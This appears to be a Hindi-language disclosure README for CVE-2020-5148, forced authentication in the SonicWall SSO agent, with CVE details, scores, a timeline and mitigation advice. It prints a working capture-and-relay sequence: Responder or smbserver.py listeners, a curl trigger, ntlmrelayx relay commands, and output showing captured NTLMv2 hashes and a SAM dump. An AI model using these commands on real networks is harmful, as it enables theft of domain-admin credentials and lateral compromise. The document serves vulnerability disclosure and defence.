
CVE-2020-5148 - SonicWall UTM SSO एजेंट में जबरन प्रमाणीकरण। एजेंट डोमेन व्यवस्थापक के रूप में अमान्य वर्कस्टेशन की जांच करता है, इसलिए एक आउटबाउंड वेब अनुरोध एक विशेषाधिकार प्राप्त NTLMv2 हैश उत्पन्न करता है। सलाह SNWLID-2021-0003।
SonicWall UTM SSO एजेंट में जबरन प्रमाणीकरण
SonicWall SSO एजेंट किसी दिए गए IP पते के पीछे के उपयोगकर्ता की पहचान उस वर्कस्टेशन को NetAPI (डिफ़ॉल्ट) या WMI से जाँचकर करता है। यह NTLM प्रमाणीकरण शुरू करने से पहले वर्कस्टेशन को मान्य नहीं करता, और सत्र के जीवनकाल तक उसी पते पर पोलिंग करता रहता है।
चूँकि SSO एजेंट सेवा को अपने द्वारा जाँचे जाने वाले हर वर्कस्टेशन और सर्वर पर व्यवस्थापकीय अधिकारों की आवश्यकता होती है, इसे व्यवहार में Domain Admin के रूप में तैनात किया जाता है। इसलिए, कोई भी अनधिकृत पक्ष जो UTM उपकरण के माध्यम से वेब ट्रैफ़िक रूट कर सकता है, एक Domain Admin खाते को अपनी पसंद के होस्ट पर प्रमाणित करवा सकता है, और उस प्रमाणीकरण को कैप्चर या रिले कर सकता है।
CVE-2020-5148 के रूप में प्रकाशित, विक्रेता सलाह SNWLID-2021-0003।
Show Up Show Out Security के Sedric Louissaint द्वारा खोजा और रिपोर्ट किया गया।
| CVE | CVE-2020-5148 |
| उत्पाद | SonicWall UTM उपकरण और SSO एजेंट / डायरेक्टरी सर्विसेज़ कनेक्टर |
| प्रभावित | SSO एजेंट 4.1.10.0; डायरेक्टरी सर्विसेज़ कनेक्टर 4.1.17 और इससे पहले |
| समाधान संस्करण | NVD फिक्स को डायरेक्टरी सर्विसेज़ कनेक्टर 4.1.19 में दर्ज करता है (नीचे दिया गया नोट देखें) |
| कमजोरी | CWE-287: अनुचित प्रमाणीकरण |
| CVSS 3.1 (NVD) | 8.2 उच्च CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N |
| CVSS (शोधकर्ता) | 8.6 AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N |
| प्रकाशित | 2021-03-05 |
| परीक्षण किया गया | Microsoft Windows Server 2012 R2 Standard |
| प्रमाणीकरण आवश्यक | कोई नहीं |
| विक्रेता सलाह | https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0003 |
NVD विवरण:
SonicWall SSO-एजेंट डिफ़ॉल्ट कॉन्फ़िगरेशन नेटवर्क में संबंधित IP की जाँच करने के लिए NetAPI का उपयोग करता है, यह क्लाइंट जाँच विधि किसी संभावित हमलावर को पासवर्ड हैश कैप्चर करने की अनुमति देती है।

एनोटेशन उसे चिह्नित करते हैं जिसे विक्रेता आरेख छोड़ देता है:
SSO एजेंट सेवा को क्वेरी करने के लिए सभी संबंधित वर्कस्टेशनों और सर्वरों पर व्यवस्थापक अधिकारों की आवश्यकता होती है। व्यावहारिक रूप से हर तैनाती में इसका मतलब है कि सेवा खाता Domain Admin है।
बिना सत्यापित होस्ट को सौंपा जाने वाला क्रेडेंशियल इसलिए निर्देशिका का सबसे उच्च-विशेषाधिकार प्राप्त खाता होता है।

कोई एक्सप्लॉइट कोड नहीं है। उपकरण द्वारा संभाले जाने वाले किसी भी सेगमेंट से कोई भी आउटबाउंड वेब अनुरोध पर्याप्त है:
curl sonicwall.com

URL अप्रासंगिक है और अनुरोध को सफल होने की आवश्यकता नहीं है। उपकरण किसी अपरिचित IP से ट्रैफ़िक देखता है, SSO एजेंट से उस उपयोगकर्ता की पहचान करने के लिए कहता है, और एजेंट उस IP से प्रमाणित होता है।
Responder या smbserver.py सुनने के साथ, एजेंट का NTLMv2 प्रमाणीकरण बिना किसी संकेत के आता है, और पोलिंग व्यवहार के कारण आता रहता है:
[SMB] NTLMv2-SSP Client : 192.168.x.x
[SMB] NTLMv2-SSP Username : <DOMAIN>\<privileged account>
[SMB] NTLMv2-SSP Hash : ...

क्रैकिंग वैकल्पिक है। जहाँ SMB साइनिंग लागू नहीं है, वहाँ प्रमाणीकरण को लाइव किसी अन्य होस्ट पर रिले किया जा सकता है, जो कनेक्शन को उसी विशेषाधिकार प्राप्त खाते के रूप में मानता है जो वह प्रतीत होता है:
ntlmrelayx.py -t <target> -smb2support -of <output>
[*] SMBD-Thread-4: Received connection from 192.168.x.x, attacking target smb://192.168.x.x
[*] Authenticating against smb://192.168.x.x as <DOMAIN>\<user> SUCCEED
[*] Starting service RemoteRegistry
[*] Target system bootKey: ...
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
[*] Done dumping SAM hashes for host: 192.168.x.x

प्रमाणीकरण एक बिना प्रमाणीकरण वाले वेब अनुरोध द्वारा ट्रिगर होता है और पूरी तरह से अलग मशीन पर उपभोग किया जाता है, जो सलाह में वर्णित पूर्ण ACL बायपास है।
एक लैब में जो आपके पास है या जिसके परीक्षण के लिए आप अधिकृत हैं, SSO के लिए कॉन्फ़िगर किए गए UTM उपकरण और डिफ़ॉल्ट NetAPI क्लाइंट जाँच विधि का उपयोग करने वाले SSO एजेंट के साथ:
sudo responder -I <interface>
# or
sudo smbserver.py c . -smb2support
curl sonicwall.com
ntlmrelayx.py -t smb://<second-host> -smb2support -of relayed
पूर्ण कमांड अनुक्रम poc/repro.sh में है।
poc/
repro.sh Listener, trigger and relay commands, commented, safe to read first
notes.md Why NetAPI triggers this, what WMI changes, detection guidance
media/
01-sso-flow-annotated.png
02-curl-crossing-network-boundary.png
03-ntlmv2-hashes-captured.png
04-ntlmrelayx-sam-dump.png
05-sso-agent-version-4.1.10.0.png
कैप्चर में दिखे उपयोगकर्ता नाम, हैश और आंतरिक पते रेडैक्ट किए गए हैं या मूल लैब से हैं।
administrator को SSO एजेंट सेवा, DC, Exchange सर्वर या टर्मिनल सर्वर के माध्यम से लॉग इन करने की अनुमति न दें। जहाँ खाते को विशेषाधिकार प्राप्त रहना आवश्यक हो, वहाँ एक पासवर्ड का उपयोग करें जो इतना लंबा हो कि ऑफ़लाइन क्रैकिंग यथार्थवादी न हो, बीस या अधिक अक्षर, कभी पुनः उपयोग न किया गया।| तिथि | घटना |
|---|---|
| 2020 | SonicWall को खोजा गया और रिपोर्ट किया गया |
| 2021-03-05 | CVE-2020-5148 प्रकाशित, सलाह SNWLID-2021-0003 |
विक्रेता प्रकटीकरण के बाद प्रकाशित, रक्षात्मक और शैक्षिक उपयोग के लिए। यहाँ कोई एक्सप्लॉइट कोड नहीं है क्योंकि किसी की आवश्यकता नहीं है, जो इस खोज का मुद्दा है। इन कमांडों को उन नेटवर्कों के विरुद्ध न चलाएँ जिनके स्वामी आप नहीं हैं या जिनके परीक्षण के लिए आपके पास लिखित प्राधिकरण नहीं है।